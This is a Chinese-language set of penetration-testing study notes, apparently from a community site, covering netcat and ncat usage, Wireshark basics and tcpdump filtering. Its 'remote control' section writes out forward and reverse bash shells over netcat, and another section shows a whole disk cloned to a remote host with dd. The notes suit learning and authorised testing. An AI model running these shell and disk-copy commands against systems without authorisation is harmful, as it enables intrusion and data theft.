NETCAT
- 传输文件
A:nc -lp port >1.mp4
B:nc -vn ip port < 1.mp4 -q 1
(服务端 A 端监听端口,等待接收文件;客户端 B 连接 A 将文件传输到该端口,完成 1 秒后断开连接)
或者
A:nc -q 1 -lp 333 <a.mp4
B:nc -vn ip port > 2.mp4
(A 监听端口,作为输入端;将文件输入该端口,当客户端 B 连接时,文件传输,完成 1 秒后断开连接)
- 传输目录
A:tar -cvf - muisic/ | nc -lp port -q 1
B:nc -vn ip port | tar -xvf -
(服务端 A 通过 tar 命令将目录打包成文件通过管道命令将文件输入到指定端口,客户端 B 连接端口通过管道进行 tar 解压)
- 传输加密文件
A:nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B:mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -vn ip port -q 1 {输入密钥}
(加密算法 rijndael-256 密钥 加密过程参数 Fbq 解密过程参数 Fbqd)
系统中 mcrypt 命令进行加密 安装:apt-get install mcrypt
- 流媒体服务器
A:cat 1.mp4 | nc -lp port
B:nc -vn ip port | mplayer -vo x11 -cache 3000 -
(mplayer 为媒体播放器)
- 端口扫描
NETCAT 默认使用 TCP 协议探测 所以端口为 1~65535
nc -vnz ip 1-65535 (参数z:zero I/O mode [used for scanning] 扫描)
nc vnzu ip 1-1024(参数u:udp协议)
- 远程克隆硬盘
A:nc -lp port | dd of=/dev/sda (of:output file)
B:dd if=/dev/sda | nc -vn ip port -q 1 (if:input file)
(远程电子取证,可以将目标服务器硬盘远程复制,或者内容;块级别)
- 远程控制
正向:
A:nc -lp port -c bash (A被控制)
B:nc ip port
反向:
A:nc -lp port
B:nc ip port -c bash (B被控制)
注:Windows 用户把 bash 改成 cmd;
NCAT
NC 缺乏加密和身份验证的能力
Ncat 包含于 nmap 工具包中
A:ncat -c bash --allow ip -vnl port --ssl (allow参数允许某个IP地址连接 ssl做加密)
B:ncat -vn ip port --ssl
不同平台/系统的 nc 参数功能不尽相同
WIRESHARK
抓包嗅探协议分析
抓包引擎
Liberalpcap——Linux
Winpcap——Windows
基本使用
- ttltime to live):生存时间,不同操作系统的 ttl 不同,Windows 通常为 128,Linux 为 64;如果一个三层的 IP 数据包,在网络里进行传输,每过一个路由,ttl 值会减 1,直到 ttl 值减为 0,如果还未到达目标地址,这个数据包会在网络里被丢弃。
TCPDUMP
- 抓包
默认只抓前 68 个字节,通常可以抓到完整的包头
tcpdump -i eth0 -s 0 -w file.cap
(i: interface,s: size(s=0,有多大抓多大),w: write >file,r: read,A: 以 ASCII 码显示具体内容,X: 以 16 进制显示具体内容,n: 不对包里的 IP 地址做名称解析,即不解析成域名)
tcpdump -r a.cap
读取 a.cap 的摘要信息 - 抓包筛选器
例如tcpdump -i eth0 tcp port 22
- 显示筛选器
tcpdump -n -r file.cap |awk
{print $3}| sort -u
(awk{print $3}
:显示第三行;sort -u:剔除相同的)
tcpdump -n src host ip -r file.cap
(显示来源于 ip 的数据包)
tcpdump -n dst host ip -r file.cap
(显示目标地址是 ip 的数据包)
tcpdump -n protocol port 33 -r file.cap
(protocol:指定协议)
高级筛选
tcp 包头的 flag 位:
CEUAPRSF
WCRCSSYI
REGKHTNN
当 ack 和 push 为 1 时即:
CEUAPRSF
00011000 =16+8=24
例:筛选 ack 和 push 为 1 的数据包
tcpdump -An 'tcp[13]=24' -r file.cap
过程文档记录
Dradis(基于 Web)
短期临时小团队资源共享
各种插件导入文件
Keepnote
Truecrypt
欢迎来到这里!
我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。
注册 关于